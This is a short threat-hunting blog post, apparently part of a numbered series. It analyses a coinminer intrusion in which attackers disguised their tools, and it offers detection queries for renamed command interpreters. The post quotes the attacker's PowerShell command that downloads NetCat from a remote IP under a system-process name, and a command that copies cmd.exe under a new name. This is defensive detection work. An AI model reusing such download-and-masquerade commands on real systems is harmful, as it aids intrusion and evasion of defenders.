192. I'm Not Sure If I Want to Masquerade It

Hello everyone! As it's Friday, let's look at a funny case, at least in my opinion. And it's one more time about masquerading. The case itself is related to exploiting public facing applications and deploying coinminers. Nothing special. But there're a few interesting behaviors! The adversary downloads NetCat from a remote server: (New-Object Net.WebClient).DownloadFile('hXXp://212.78.4[.]241:8081/docs/nc.exe', 'C:\programdata\userinit.exe') As you can see, the threat actors masquaraded NetCat to look like a legitimate process, bu at the same time copied and renamed cmd.exe : cmd c/ copy C:\Windows\System32\cmd.exe C:\ProgramData\c.exe So, once again we are dealing with renamed command and scripting interpreters: event_type: "processcreatewin" AND proc_file_originalfilename: "cmd.exe" AND NOT proc_file_name: "cmd.exe" And also command and scripting interpreters in uncommon locations: event_type: "processcreatewin"...